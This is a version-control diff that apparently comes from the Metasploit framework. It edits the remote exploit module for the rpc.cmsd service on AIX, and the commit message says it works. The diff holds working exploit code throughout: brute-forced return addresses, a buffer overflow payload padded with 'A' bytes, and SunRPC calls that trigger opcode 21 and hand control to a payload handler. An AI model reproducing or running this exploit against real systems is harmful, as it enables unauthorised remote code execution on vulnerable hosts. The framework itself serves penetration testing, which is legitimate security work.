it works! don't forget to "set AIX <version>"

git-svn-id: file:///home/svn/framework3/trunk@8421 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/aix/rpc_cmsd_opcode21.rb

@@ -57,10 +57,12 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Arch'     => 'ppc',
 							'Platform' => 'aix',
 							'Ret'      => 0xcafebabe,
-							'AIX'  => '5.1',
+							'AIX'      => '5.1',
 							'Payload'  => { 'AIX' => '5.1' },
 							'Bruteforce' =>
 							{
+								#'Start' => { 'Ret' => 0x20230168 },
+								#'Stop'  => { 'Ret' => 0x20230168 },
 								'Start' => { 'Ret' => 0x2022dfc8 },
 								'Stop'  => { 'Ret' => 0x2022dfc8 },
 								'Step'  => 1024
@@ -73,9 +75,10 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def brute_exploit(brute_target)
-		begin
-			print_status("Trying to exploit rpc.cmsd with address 0x%08x..." % brute_target['Ret'])
 
+		print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
+
+		begin
 			if (not sunrpc_create('udp', 100068, 4))
 				raise RuntimeError, 'sunrpc_create failed'
 			end
@@ -88,15 +91,14 @@ class Metasploit3 < Msf::Exploit::Remote
 				sunrpc_call(7, xdr, 2)
 			}
 
-			# debugger attach!
-			#sleep(5)
+			#print_status("ATTACH DEBUGGER NOW!"); sleep(5)
 
 			buf = "\x41" * payload_space
 			buf << [brute_target['Ret']].pack('N')
 
 			xdr = XDR.encode(buf, "")
 			sunrpc_authunix('localhost', 0, 0, [])
-			sunrpc_call(21, xdr, 2)
+			sunrpc_call(21, xdr, 1)
 
 			handler(sunrpc_callsock)
 			sunrpc_destroy
@@ -109,4 +111,3 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 end
-